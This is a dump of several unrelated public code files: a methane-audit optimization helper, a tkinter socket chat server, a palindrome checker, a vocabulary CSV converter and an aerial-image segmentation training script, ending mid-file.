np.full((N,), r_big_r_small[1])\n elif r_big_r_small.shape == (2 * N,):\n r_big = r_big_r_small[:N]\n r_small = r_big_r_small[N:]\n else:\n raise ValueError(f\"Bad shape for r_big_r_small: {r_big_r_small.shape}\")\n return r_big, r_small\n\n\ndef _probability_weight(prob, x, y):\n return prob * x + (1 - prob) * y\n\n\ndef dwl_target_e_high_detect(self, r_big_r_small):\n r_big, r_small = _divide_up_r(self.N, r_big_r_small)\n dwl = np.sum(\n _probability_weight(\n self.prob_is_large,\n dwl_terms_for_objective(self, r_big),\n dwl_terms_for_objective(self, r_small),\n )\n )\n return dwl\n\n\ndef dwl_target_e_high_detect_diff1(self, r_big_r_small):\n \"\"\"\n Note: code in this function works with both the uniform and differentiated\n cases by taking the sum if necessary\n \"\"\"\n r_big, r_small = _divide_up_r(self.N, r_big_r_small)\n diff1_big = dwl_diff1(self, r_big) * self.prob_is_large\n diff1_small = dwl_diff1(self, r_small) * (1 - self.prob_is_large)\n if len(r_big_r_small) == 2:\n # One value for r_big, one value for r_small\n # _divide_up_r already checks that r_big_r_small either has shape (2,)\n # or (2 * N,)\n diff1_big = np.sum(diff1_big)\n diff1_small = np.sum(diff1_small)\n\n diff1 = np.concatenate((diff1_big, diff1_small), axis=None)\n assert diff1.shape == r_big_r_small.shape\n return diff1\n\n\ndef dwl_target_e_high_detect_incl_cost(self, r):\n dwl = dwl_target_e_high_detect(self, r)\n cost = self.audit_cost * cost_target_e_high_detect(self, r)\n return np.sum(dwl + cost)\n\n\ndef dwl_target_e_high_detect_incl_cost_diff1(self, r):\n dwl_diff1 = dwl_target_e_high_detect_diff1(self, r)\n cost_diff1 = self.audit_cost * cost_target_e_high_detect_diff1(self, r)\n return dwl_diff1 + cost_diff1\n\n\ndef hessian_target_e_high_detect_incl_cost(self, r_big_r_small, lagrange, obj_factor):\n \"\"\"See comments in hessian_target_e_high_detect\n Same idea, but now we're multiplying by audit_cost instead of lagrange.\n \"\"\"\n r_big, r_small = _divide_up_r(self.N, r_big_r_small)\n # Block A:\n block_A = obj_factor * self.prob_is_large * dwl_diff2(\n self, r_big\n ) + self.audit_cost * self.prob_is_large * (\n prob_leak_times_r_diff2(self, r_big) + prob_no_leak_diff2(self, r_big) * r_small\n )\n # Blocks B:\n block_B = self.audit_cost * self.prob_is_large * prob_no_leak_diff1(self, r_big)\n # Block C:\n block_C = obj_factor * (1 - self.prob_is_large) * dwl_diff2(self, r_small)\n if self.num_vars == 2:\n block_A = np.sum(block_A)\n block_B = np.sum(block_B)\n block_C = np.sum(block_C)\n # Expected output is a 1d array that will be interpreted as the COO matrix\n # values. The order of the output here need to match the order in\n # hessianstructure_target_e_high.\n return np.concatenate([block_A, block_B, block_C], axis=None)\n\n\ndef hessianstructure_default(self):\n \"\"\"Define the structure of the hessian (2nd deriv matrix) of the\n lagrangian with respect to r_i, r_j. It's diagonal for almost all cases.\n \"\"\"\n hs = scipy.sparse.eye(self.num_vars, format=\"coo\")\n return (hs.col, hs.row)\n\n\ndef hessianstructure_target_e_high(self):\n \"\"\"Define the structure of the hessian (2nd deriv matrix) of the\n lagrangian with respect to i, j. It's no longer diagonal because we're using\n a double-length choice variable r_big_r_small.\n Instead each quadrent of the matrix is diagonal.\n (In the case of uniform r and rho; we end up with a dense 2x2)\n\n Note that derivatives are symmetric, and ipopt knows this, so we only have\n to deal with the lower triangle.\n \"\"\"\n assert self.num_vars in {2 * self.N, 2}\n diag = scipy.sparse.identity(self.num_vars // 2, dtype=\"i\", format=\"coo\")\n hs = scipy.sparse.bmat([[diag, None], [diag, diag]], format=\"coo\")\n # The indexes that come out here are in the order written (rows, then cols)\n # In other words, sub-matrices A, B, C\n return (hs.col, hs.row)\n\n\nclass ProblemSetup(object):\n def __init__(self, data_param, audit_info):\n \"\"\"\n Set up the problem, with a budget constraint.\n Supports target_x and target_e cases.\n \"\"\"\n\n # Define and pre-compute some parameters that don't depend on r.\n self.e = data_param.e_size_expect\n self.pH = data_param.price_H\n self.τT = audit_info.τT\n self.A = data_param.cost_coef[..., 0]\n self.α = data_param.cost_coef[..., 1]\n self.recip_α = 1.0 / self.α\n self.recip_α_plus1 = 1.0 / (self.α + 1.0)\n self.recip_A = 1.0 / self.A\n self.δH = data_param.time_H * SOCIAL_COST_METHANE_PER_KG\n self.e_p_δ_H = self.e * (self.pH + self.δH)\n self.audit_cost = audit_info.audit_cost\n self.N = len(self.e)\n self.prob_is_large = data_param.prob_is_large\n\n if audit_info.audit_frac > 0 and audit_info.audit_cost == 0:\n if audit_info.audit_rule == \"target_x\":\n self.fn_objective = objective_dwl\n self.fn_gradient = dwl_diff1\n self.fn_constraints = cost_target_x\n self.fn_jacobian = cost_target_x_diff1\n self.fn_hessian = hessian_target_x\n self.fn_hessianstructure = hessianstructure_default\n self.num_vars = self.N\n elif audit_info.audit_rule == \"target_e\":\n if audit_info.detect_threshold == 0:\n self.fn_objective = objective_dwl\n self.fn_gradient = dwl_diff1\n self.fn_constraints = cost_target_e_low_detect\n self.fn_jacobian = prob_leak_times_r_diff1\n self.fn_hessian = hessian_target_e_low_detect\n self.fn_hessianstructure = hessianstructure_default\n self.num_vars = self.N\n else:\n self.fn_objective = dwl_target_e_high_detect\n self.fn_gradient = dwl_target_e_high_detect_diff1\n self.fn_constraints = cost_target_e_high_detect\n self.fn_jacobian = cost_target_e_high_detect_diff1\n self.fn_hessian = hessian_target_e_high_detect\n self.fn_hessianstructure = hessianstructure_target_e_high\n self.num_vars = self.N * 2\n else:\n raise ValueError(f\"Bad audit_rule: {audit_info.audit_rule}\")\n elif audit_info.audit_frac == 0 and audit_info.audit_cost > 0:\n self.fn_constraints = no_constraint\n self.fn_jacobian = no_jacobian\n if audit_info.audit_rule == \"uniform\":\n self.fn_objective = dwl_uniform_incl_cost\n self.fn_gradient = dwl_uniform_incl_cost_diff1\n self.fn_hessian = hessian_uniform_incl_cost\n self.fn_hessianstructure = hessianstructure_default\n self.num_vars = 1\n elif audit_info.audit_rule == \"target_x\":\n self.fn_objective = dwl_target_x_incl_cost\n self.fn_gradient = dwl_target_x_incl_cost_diff1\n self.fn_hessian = hessian_target_x_incl_cost\n self.fn_hessianstructure = hessianstructure_default\n self.num_vars = self.N\n elif audit_info.audit_rule == \"target_e\":\n if audit_info.detect_threshold == 0:\n self.fn_objective = dwl_target_e_low_detect_incl_cost\n self.fn_gradient = dwl_target_e_low_detect_incl_cost_diff1\n self.fn_hessian = hessian_target_e_incl_cost\n self.fn_hessianstructure = hessianstructure_default\n self.num_vars = self.N\n else:\n self.fn_objective = dwl_target_e_high_detect_incl_cost\n self.fn_gradient = dwl_target_e_high_detect_incl_cost_diff1\n self.fn_hessian = hessian_target_e_high_detect_incl_cost\n self.fn_hessianstructure = hessianstructure_target_e_high\n self.num_vars = self.N * 2\n else:\n raise ValueError(f\"Bad audit_rule: {audit_info.audit_rule}\")\n else:\n raise ValueError(\n f\"Exactly one of audit_frac and audit_cost should be positive\"\n )\n\n # Define the functions like this so we get proper bound methods (and\n # access to `self`), but allowing the actual function to vary, and\n # without mucking around with MethodType\n def objective(self, x):\n return self.fn_objective(self, x)\n\n def gradient(self, x):\n return self.fn_gradient(self, x)\n\n def constraints(self, x):\n return self.fn_constraints(self, x)\n\n def jacobian(self, x):\n return self.fn_jacobian(self, x)\n\n def hessian(self, x, lagrange, obj_factor):\n return self.fn_hessian(self, x, lagrange, obj_factor)\n\n def hessianstructure(self):\n return self.fn_hessianstructure(self)\n\n\n# Some functions we use to calculate the uniform-budgeted case analytically\n\n\ndef prob_leak_with_policy(t_effective, cost_coef, e_size, price_H):\n \"\"\"\n Probability of a leak (1 - q) under policy t_effective\n\n Note that e_size may be either e_size_expect or e_size_draw, depending what\n we're doing with the function.\n \"\"\"\n A = cost_coef[..., 0]\n α = cost_coef[..., 1]\n prob = (e_size * (price_H + t_effective) / A) ** (1 / α)\n assert is_probability(prob)\n return prob\n\n\ndef dwl_deriv1_wrt_r(r, data_param, τT):\n r\"\"\"\n The first derivative with respect to r of the DWL for one well\n Only used for solve_for_λ_uniform\n\n \\frac{\n A^{- \\frac{1}{\\alpha}}\n e^{\\frac{\\alpha + 1}{\\alpha}}\n \\tau T\n (\\delta H - \\tau T r)\n (p H + \\tau T r)^{\\frac{1 - \\alpha}{\\alpha}}\n }{\n \\alpha\n }\n \"\"\"\n # cost_coef is a (1, 2) or (N, 2) array\n A = data_param.cost_coef[..., 0]\n α = data_param.cost_coef[..., 1]\n recip_α = 1 / α\n δ = SOCIAL_COST_METHANE_PER_KG\n H = data_param.time_H\n\n dwl_diff1 = (\n A ** (-recip_α)\n * (data_param.e_size_expect) ** ((α + 1) * recip_α)\n * τT\n * (δ * H - τT * r)\n * (data_param.price_H + τT * r) ** ((1 - α) * recip_α)\n * recip_α\n )\n return dwl_diff1\n\n\ndef is_budget_binding(audit_info, time_H):\n \"\"\"\n If we can audit every well with prob (δ * H) / (τ * T), there's no\n benefit to auditing more. (and the converse)\n \"\"\"\n return audit_info.audit_frac < (SOCIAL_COST_METHANE_PER_KG * time_H / audit_info.τT)\n\n\ndef calc_well_audit_prob_uniform(data_param, audit_info, r_guess):\n assert len(data_param.e_size_expect) > 1\n if not (audit_info.audit_frac > 0 and audit_info.audit_cost == 0):\n raise ValueError(\"Other cases should go to ipopt\")\n if is_budget_binding(audit_info, data_param.time_H):\n r, λ = solve_for_λ_uniform(data_param, audit_info, r_guess)\n else:\n r = SOCIAL_COST_METHANE_PER_KG * data_param.time_H / audit_info.τT\n λ = 0.0\n return r, λ\n\n\ndef solve_for_λ_uniform(data_param, audit_info, r_guess):\n \"\"\"\n Solve for λ for the uniform-audit policy.\n Returns resulting r and λ\n\n Uses the analytical result that when the budget is binding, r = audit_frac,\n and λ = mean( d DWL / dr )\n\n \"\"\"\n N = len(data_param.e_size_expect)\n r = np.full((N,), audit_info.audit_frac)\n dwl_deriv_vals = dwl_deriv1_wrt_r(r, data_param, audit_info.τT)\n λ = np.mean(dwl_deriv_vals)\n return audit_info.audit_frac, λ\n\n\ndef is_probability(x):\n \"\"\"Check if `x` is in [0, 1]\"\"\"\n return np.all((x >= 0.0) & (x <= 1.0))\n\n\ndef read_constants(json_file=\"code/constants.json\"):\n \"\"\"\n Read some important constants from `filename`.\n\n Notes on their values:\n * SOCIAL_COST_METHANE_PER_KG is $2, which is about $51.55 / ton CO2e. That's low.\n * METHANE_GWP is 29.8, from IPCC AR6\n * TAU_LEVELS are 2 * SOCIAL_COST_METHANE_PER_KG, and $5 per ton CO2e\n * T_LEVELS are in hours, so 1day is 24, 1week is 168, 1month is 730, 3month is 2190, and 1year is 8760.\n * Not all of these are used. If defining additional levels, make sure the cross-product of tau_levels and t_levels is still unique (e.g. can't add 2month because high * 1month == med * 2month)\n\n If we were defining in python instead of reading json:\n TAU_LEVELS = {\n \"high\": 2 * SOCIAL_COST_METHANE_PER_KG,\n \"med\": SOCIAL_COST_METHANE_PER_KG,\n \"low\": 5 / 1000 * METHANE_GWP, # low = $5/ton CO2e\n }\n T_LEVELS = {\n \"1day\": 24.0, # 1 day\n \"1week\": 168.0, # 1 week\n \"1month\": 730.0, # 1 month\n \"3month\": 2190.0, # 3 months\n \"1year\": 8760.0, # 1 year\n }\n\n * LEAK_SIZE_DEF is 5.0 kg/hr, based on the detection threshold of AVIRIS-NG (*not* the policy detection threshold)\n * AUDIT_COST_TO_COMPARE_FIXED_VS_OPTIM_DWL is $600/audit\n * N_WELL_PADS is the number of well pads in this data. It's checked in some of the code, but included here for convenience.\n * MODEL_NAMES known model names, categorized.\n * note that the \"normal\" models still get a lognormal treatment\n \"\"\"\n with open(json_file, \"rt\") as f:\n const = json.load(f)\n expected_names = {\n \"SOCIAL_COST_METHANE_PER_KG\",\n \"METHANE_GWP\",\n \"LEAK_SIZE_DEF\",\n \"AUDIT_COST_TO_COMPARE_FIXED_VS_OPTIM_DWL\",\n \"N_WELL_PADS\",\n \"TAU_LEVELS\",\n \"T_LEVELS\",\n \"MODEL_NAMES\",\n \"POLICY_DETECT_THRESHOLD_HIGH\",\n \"POLICY_DETECT_THRESHOLD_LOW\",\n }\n assert expected_names == set(const.keys())\n return const\n\n\ndef abatement_cost_per_pad(prob_leak, data_param):\n \"\"\"\n Abatement cost for the well.\n\n Not used in the optimization, since we have analytical expressions for DWL.\n \"\"\"\n A = data_param.cost_coef[..., 0]\n α = data_param.cost_coef[..., 1]\n α_plus1 = α + 1\n abatement_cost = -(A / α_plus1) * (prob_leak ** α_plus1)\n\n return abatement_cost\n\n\nSOCIAL_COST_METHANE_PER_KG = read_constants()[\"SOCIAL_COST_METHANE_PER_KG\"]\n\n\nif __name__ == \"__main__\":\n raise RuntimeError(\"This file isn't meant to be run directly.\")\n","repo_name":"karldw/paper_hard_to_measure_well","sub_path":"code/outcomes_analysis_helpers.py","file_name":"outcomes_analysis_helpers.py","file_ext":"py","file_size_in_byte":26940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16664761024","text":"import tkinter\r\nfrom tkinter import *\r\nimport socket, threading\r\nimport time\r\nimport os\r\n\r\nserver_window = tkinter.Tk()\r\nserver_window.title('服务器')\r\nserver_window.geometry(\"400x300+200+20\")\r\nusers = {}\r\n\r\n\r\ndef run(connect, addrss):\r\n message = connect.recv(1024).decode(\"utf-8\")\r\n userName = message.split()[0]\r\n user_ip = message.split()[1]\r\n user_port = message.split()[2]\r\n print(userName)\r\n print(user_ip)\r\n print(user_port)\r\n\r\n user_info = []\r\n user_info.append(connect)\r\n user_info.append(user_ip)\r\n user_info.append(user_port)\r\n users[userName] = user_info\r\n\r\n text.insert(tkinter.INSERT, userName + \"连接\\n\")\r\n dir = os.getcwd()\r\n file = dir + \"/log.txt\"\r\n with open(file, mode='a', encoding='utf-8') as file_obj:\r\n file_obj.write(userName + \"连接\\n\")\r\n\r\n printStr =\"登录成功!\\n\"+\"当前在线的好友有:\"+str(list(users.keys()))+\"\\n\"\r\n for key in users:\r\n printStr += key + \":ip: \" + users[key][1] + \" port: \" + users[key][2] + \"\\n\"\r\n connect.send(printStr.encode())\r\n\r\n printStr = time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime())\r\n printStr += userName + \"已上线\\n\"+\"当前在线的好友有:\\n\"\r\n for key in users:\r\n printStr += key + \":ip: \" + users[key][1] + \" port: \" + users[key][2] + \"\\n\"\r\n print(printStr)\r\n for key in users:\r\n if key != userName:\r\n users[key][0].send(printStr.encode())\r\n\r\n while True:\r\n rData = connect.recv(1024)\r\n print(rData)\r\n dataStr = rData.decode(\"utf-8\")\r\n\r\n infolist = dataStr.split(\":\")\r\n\r\n if len(infolist[0]) == 0:\r\n for key in users:\r\n if key != userName:\r\n users[key][0].send((userName + \"说(群发):\" + infolist[1]).encode(\"utf\"))\r\n\r\n elif infolist[0] == \"exit\":\r\n del users[userName]\r\n printStr = \"\" + userName + \"下线\\n\"\r\n dir = os.getcwd()\r\n file = dir + \"/log.txt\"\r\n with open(file, mode='a', encoding='utf-8') as file_obj:\r\n file_obj.write(userName + \"下线\\n\")\r\n text.insert(tkinter.INSERT, printStr)\r\n for key in users:\r\n printStr = userName + \"已下线\\n\"+\"当前在线的好友有:\"+str(list(users.keys()))+\"\\n\"\r\n users[key][0].send(printStr.encode())\r\n \r\n else:\r\n print(infolist[0])\r\n print(\"=================\")\r\n print(infolist[0]=='a') \r\n if infolist[0] in users:\r\n users[infolist[0]][0].send((userName + \"说(私聊):\" + infolist[1]).encode(\"utf\"))\r\n else:\r\n printStr =infolist[0]+\"不在线,上条消息未发出\"+\"\\n\"\r\n connect.send(printStr.encode())\r\n \r\n\r\ndef startSever():\r\n s = threading.Thread(target=start) \r\n s.start()\r\n\r\n \r\ndef start():\r\n ipStr = textServer.get(\"0.0\",END).split(\":\")[0]\r\n ipStr = ipStr.rstrip(\"\\n\")\r\n portStr = textServer.get(\"0.0\", END).split(\":\")[1]\r\n portStr = portStr.rstrip(\"\\n\")\r\n\r\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n server.bind((ipStr, int(portStr)))\r\n server.listen(10)\r\n\r\n text.insert(tkinter.INSERT, \"服务器启动成功!\\n\")\r\n\r\n while True:\r\n connect, addrss = server.accept()\r\n t = threading.Thread(target=run, args=(connect, addrss))\r\n t.start()\r\n\r\n\r\nlabelServer = tkinter.Label(server_window, text=\"ip:Port\").grid(row=1, column=0)\r\neserver = tkinter.Variable()\r\ntextServer = tkinter.Text(server_window, height=1, width=35)\r\ntextServer.grid(row=1, column=1)\r\n\r\n\r\nbutton = tkinter.Button(server_window, text=\"启动\", command=startSever).grid(row=1, column=2,padx=5)\r\ntext = tkinter.Text(server_window, height=15, width=35)\r\nlabeltext = tkinter.Label(server_window, text='连接消息').grid(row=3, column=0)\r\ntext.grid(row=3, column=1)\r\n\r\nserver_window .mainloop()\r\n\r\n","repo_name":"YLSnowy/computer-network","sub_path":"chat/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1198070796","text":"import re\n\ndef main():\n print(\"palindroomzin\" if isPalindroomZin(\"Er is daar nog onraad, Sire.\") else \"geen palindroomzin\")\n\ndef isPalindroomZin(sentence):\n sentence = re.sub(r\"[^A-Za-z]+\", '', sentence).lower()\n for letter in range(0, len(sentence)):\n if sentence[letter] != sentence[::-1][letter]:\n return False\n return True\n\nmain()","repo_name":"JamieKalloe/ISCRIPT","sub_path":"Week 2/Opdracht10.py","file_name":"Opdracht10.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73816653926","text":"import csv\nimport os\nimport sys\n\n\"\"\"\nProgramm mit der Entsprechenden csv aufrufen, um aus der Tabelle das javascript Array bauen zu lassen\n\"\"\"\n\ndef rightKey(key):\n return key.split(\";\")[0]\n\nverben = {}\nnomen = {}\nadjektive = {}\nverbenKeys = []\nnomenKeys = []\nadjektiveKeys = []\nverbenFinished = False\nnomenFinished = False\n\nwith open(sys.argv[1], newline=\"\") as cee:\n smartreader = csv.reader(cee, quotechar='|')\n for row in smartreader:\n key = rightKey(row[0])\n if not (row == [\"Verben;\"] or row == ['Verben;'] or row == ['Verben;']) and (not verbenFinished): # Verben reinpacken\n if row != ['Nomen;']:\n verbenKeys.append(key)\n verben[key] = [row[0].split(\";\")[1]] # shitty key einmal abhandeln\n for word in row[1:]: # values dazupacken\n verben[key].append(word.strip())\n else:\n verbenFinished = True\n elif verbenFinished and (not nomenFinished): # Nomen reinpacken\n if row != ['Adjektive;']:\n nomenKeys.append(key)\n nomen[key] = [row[0].split(\";\")[1]] # shitty key einmal abhandeln\n for word in row[1:]: # values dazupacken\n nomen[key].append(word.strip())\n else:\n nomenFinished = True\n else: # Adjektive reinpacken\n adjektiveKeys.append(key)\n adjektive[key] = [row[0].split(\";\")[1]] # shitty key einmal abhandeln\n for word in row[1:]: # values dazupacken\n adjektive[key].append(word.strip())\n\n\n\n\"\"\"\nDurchlaufe die Dictionarys und packe die Values mit den Keys in einem array zusammen\narray = [\n [\"key1\", [\"value1\",\"value2\"]], Adjektiv\n [\"key2\", [\"value1\",\"value2\"]], Nomen\n [\"key3\", [\"value1\",\"value2\"]], Verb\n [\"key4\", [\"value1\",\"value2\"]] Adjektiv\n ...\n]\n\"\"\"\nfile = open(\"array.txt\",\"a\")\n\nfile.write(\"var vocabulary = [ \\n\\n\")\n\ncounter = 0\nwhile (counter < len(nomen) or counter < len(verben) or counter < len(adjektive)):\n try:\n key = verbenKeys[counter]\n file.write(\"[\\'\"+key+\"\\', \"+str(verben[key]).lower()+\"],\\n\")\n except:\n print(\"Alle Verben drin\")\n pass\n try:\n key = nomenKeys[counter]\n file.write(\"[\\'\"+key+\"\\', \"+str(nomen[key]).lower()+\"],\\n\")\n except:\n print(\"Alle Nomen drin\")\n pass\n try:\n key = adjektiveKeys[counter]\n file.write(\"[\\'\"+key+\"\\', \"+str(adjektiveKeys[key]).lower()+\"],\\n\")\n except:\n print(\"Alle Adjektive drin\")\n pass\n counter +=1\nprint(\"Fertig!\")\nfile.write(\"\\n];\")\nprint(len(nomen)+\" Nomen\")\nprint(len(adjektive)+\" Adjektive\")\nprint(len(verben)+\" Verben\")","repo_name":"Zepcon/stuff","sub_path":"smarty.py","file_name":"smarty.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43813852422","text":"from glob import glob\nimport os\n\nfrom tensorflow.keras.optimizers import Adam\nfrom PIL import Image\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.models import Model\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\nfrom model_s import *\n\n\nSEED = 42\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n# Image size that we are going to use\nIMG_SIZE = 512\n# Our images are RGB (3 channels)\nN_CHANNELS = 3\n# Scene Parsing has 150 classes + `not labeled`\nN_CLASSES = 1\n\n\ndef calc_iou_plot(train, valid):\n\t# Make sure mask is binary for IOU calculation\n\tsize = len(valid)\n\t# y_train_mod = np.zeros((size, im_width, im_height), dtype=np.int32)\n\ty_train_mod = train.squeeze() > binarize\n\n\t# Set up Predicted Mask for IOU calculation\n\tpreds_train_mod = np.zeros((size, 512, 512), dtype=np.int32)\n\tpreds_train_sq = preds_train.squeeze()\n\n\tthresholds = np.linspace(0.0001, 1, 50)\n\tious = np.zeros(len(thresholds))\n\tcount = 0\n\n\tfor threshold in thresholds:\n\t\tfor i in range(size):\n\t\t\tpreds_train_mod[i, :, :] = np.where(preds_train_sq[i, :, :] > threshold, 1, 0)\n\n\tiou = np.zeros(size)\n\n\tfor i in range(size):\n\t\tintersection = np.logical_and(y_train_mod[i, :, :], preds_train_mod[i, :, :])\n\t\tunion = np.logical_or(y_train_mod[i, :, :], preds_train_mod[i, :, :])\n\t\tiou[i] = np.sum(intersection) / np.sum(union)\n\n\tious[count] = np.mean(iou)\n\tcount += 1\n\n\tthreshold_best_index = np.argmax(ious)\n\tiou_best = ious[threshold_best_index]\n\tthreshold_best = thresholds[threshold_best_index]\n\n\tplt.figure()\n\tplt.title(f'Training Thresh vs IoU {threshold_best}, {iou_best}')\n\tplt.plot(thresholds, ious)\n\tplt.plot(threshold_best, iou_best, label='Best threshold')\n\tplt.xlabel('Threshold')\n\tplt.ylabel('IoU')\n\tplt.legend()\n\tplt.show()\n\n\ndef parse_image(img_path: str) -> dict:\n\timage = tf.io.read_file(img_path)\n\timage = tf.image.decode_png(image, channels=3)\n\timage = tf.image.convert_image_dtype(image, tf.uint8)\n\tmask_path = tf.strings.regex_replace(img_path, 'images', 'gt')\n\tmask = tf.io.read_file(mask_path)\n\t# The masks contain a class index for each pixels\n\tmask = tf.image.decode_png(mask, channels=1)\n\t#mask = tf.where(mask == 255, np.dtype('uint8').type(1), mask)\n\t# Note that we have to convert the new value (0)\n\t# With the same dtype than the tensor itself\n\n\treturn {'image': image, 'segmentation_mask': mask}\n\n\n@tf.function\ndef normalize(input_image: tf.Tensor, input_mask: tf.Tensor) -> tuple:\n\tinput_image = tf.cast(input_image, tf.float32) / 255.0\n\tinput_mask = tf.cast(input_mask, tf.float32) / 255.0\n\n\treturn input_image, input_mask\n\n\n@tf.function\ndef load_image_train(datapoint: dict) -> tuple:\n\t# input_image = tf.image.resize(datapoint['image'], (256, 256))\n\t# input_mask = tf.image.resize(datapoint['segmentation_mask'], (256, 256))\n\tinput_image = datapoint['image']\n\tinput_mask = datapoint['segmentation_mask']\n\n\tif tf.random.uniform(()) > 0.5:\n\t\tinput_image = tf.image.flip_left_right(input_image)\n\t\tinput_mask = tf.image.flip_left_right(input_mask)\n\n\tinput_image, input_mask = normalize(input_image, input_mask)\n\n\treturn input_image, input_mask\n\n\n@tf.function\ndef load_image_test(datapoint: dict) -> tuple:\n\t# input_image = tf.image.resize(datapoint['image'], (256, 256))\n\t# input_mask = tf.image.resize(datapoint['segmentation_mask'], (256, 256))\n\tinput_image = datapoint['image']\n\tinput_mask = datapoint['segmentation_mask']\n\tinput_image, input_mask = normalize(input_image, input_mask)\n\n\treturn input_image, input_mask\n\n\nif __name__ == '__main__':\n\tprint(AUTOTUNE)\n\t# dataset_path = 'aerial_image_dataset_1024/'\n\tdataset_path = 'aerial_image_dataset/'\n\ttraining_data = 'training/'\n\tval_data = 'validation/'\n\n\tTRAINSET_SIZE = len(glob(dataset_path + training_data + '/images/*.png'))\n\tprint(f'The Training Dataset contains {TRAINSET_SIZE} images.')\n\n\tVALSET_SIZE = len(glob(dataset_path + val_data + '/images/*.png'))\n\tprint(f'The Validation Dataset contains {VALSET_SIZE} images.')\n\n\ttrain_dataset = tf.data.Dataset.list_files(dataset_path + training_data + 'images/*.png', seed=SEED)\n\ttrain_dataset = train_dataset.map(parse_image)\n\n\tval_dataset = tf.data.Dataset.list_files(dataset_path + val_data + 'images/*.png', seed=SEED)\n\tval_dataset = val_dataset.map(parse_image)\n\n\t# Batch size of 2 for 1024\n\tBATCH_SIZE = 4\n\n\t# for reference about the BUFFER_SIZE in shuffle:\n\t# https://stackoverflow.com/questions/46444018/meaning-of-buffer-size-in-dataset-map-dataset-prefetch-and-dataset-shuffle\n\tBUFFER_SIZE = 1000\n\n\tdataset = {'train': train_dataset, 'val': val_dataset}\n\n\t# -- Train Dataset -- #\n\tdataset['train'] = dataset['train'].map(load_image_train, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\tdataset['train'] = dataset['train'].shuffle(buffer_size=BUFFER_SIZE, seed=SEED)\n\t# dataset['train'] = dataset['train'].repeat()\n\tdataset['train'] = dataset['train'].batch(BATCH_SIZE)\n\tdataset['train'] = dataset['train'].prefetch(buffer_size=AUTOTUNE)\n\n\t# -- Validation Dataset -- #\n\tdataset['val'] = dataset['val'].map(load_image_test)\n\t# dataset['val'] = dataset['val'].repeat()\n\tdataset['val'] = dataset['val'].batch(BATCH_SIZE)\n\tdataset['val'] = dataset['val'].prefetch(buffer_size=AUTOTUNE)\n\n\t# config = tf.compat.v1.ConfigProto(gpu_options=tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction=0.95))\n\t# config.gpu_options.allow_growth = True\n\t# session = tf.compat.v1.Session(config=config)\n\tEPOCHS = 20\n\n\tSTEPS_PER_EPOCH = TRAINSET_SIZE // BATCH_SIZE\n\tVALIDATION_STEPS = VALSET_SIZE // BATCH_SIZE\n\tinput_size = (IMG_SIZE, IMG_SIZE, N_CHANNELS)\n\n\t# model = build_unet(input_size, 1)\n\t# model = get_unet(input_size)\n\tmodel = get_efficientnet_unet(input_size)\n\t# model = get_efficientnet_as_unet(input_size)\n\n\tmodel.compile(optimizer=Adam(learning_rate=0.001), loss=tf.keras.losses.BinaryCrossentropy(), metrics=['accuracy'])\n\tmodel.summary()\n\t# model_checkpoint = ModelCheckpoint('unet-{epoch:02d}.hdf5', monitor='loss', verbose=1)\n\tmodel_checkpoint = ModelCheckpoint('efficientnet.hdf5', monitor='loss', verbose=1)\n\t# model_checkpoint = ModelCheckpoint('efficientnet_as_unet.hdf5', monitor='loss', verbose=1)\n\tresults = model.fit(dataset['train'], epochs=EPOCHS, steps_per_epoch=STEPS_PER_EPOCH, validation_steps=VALIDATION_STEPS, validation_data=dataset['val'], callbacks=[model_checkpoint])\n\n\n\t# # Model\n\t# model = model_ion()\n\t# model.summary()\n\t#\n\t# model.compile(\n\t# \toptimizer='adam',\n\t# \tloss=tf.keras.losses.BinaryCrossentropy(),\n\t# \tmetrics=['accuracy']\n\t# )\n\t#\n\t# epochs = 50\n\t# history = model.fit(\n\t# \tdataset['train'],\n\t# \tvalidation_data=dataset['val'],\n\t# \tepochs=epochs\n\t# )\n\n\n\t# Plot Loss vs Epoch\n\tplt.figure()\n\tplt.title('Learning curve')\n\tplt.plot(results.history['loss'], label='loss')\n\tplt.plot(results.history['val_loss'], label='val_loss')\n\tplt.plot(np.argmin(results.history['val_loss']), np.min(results.history['val_loss']), marker='x', label='best model')\n\tplt.xlabel('Epochs')\n\tplt.ylabel('log_loss')\n\tplt.legend()\n\tplt.show()\n\n\t# Plot Accuracy vs Epoch\n\tacc = results.history['accuracy']\n\tval_acc = results.history['val_accuracy']\n\tepochs = range(len(acc))\n\tplt.figure()\n\tplt.title('Training and validation accuracy')\n\tplt.plot(epochs, acc, label='Training acc')\n\tplt.plot(epochs, val_acc, label='Validation acc')\n\tplt.legend()\n\tplt.show()\n\n\t# Calc iou\n\tmodel.evaluate(dataset['train'], dataset['val'], verbose=2)\n\tpreds_test = model.predict(dataset['val'], verbose=2)\n\n\tix = np.random.randint(len(dataset['val']))\n\tthreshold = .4082\n\tbinarize = .1\n\tintersection = np.logical_and(dataset['val'][ix].squeeze() > binarize, preds_test[ix].squeeze() > threshold)\n\tunion = np.logical_or(dataset['val'][ix].squeeze() > binarize, preds_test[ix].squeeze() > threshold)\n\tiou = np.sum(intersection) / np.sum(union)\n\tprint('IOU:', iou)\n\n\t# Comment dataset.repeat() lines\n\tcalc_iou_plot(dataset['train'], dataset['val'])\n","repo_name":"savusebastian/master_segmentation","sub_path":"big/data_s.py","file_name":"data_s.py","file_ext":"py","file_size_in_byte":7877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43032875391","text":"import zipfile\nimport gdown\nfrom pyparsing import col\nimport torchcde as cde\nimport torch\nimport numpy as np\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as 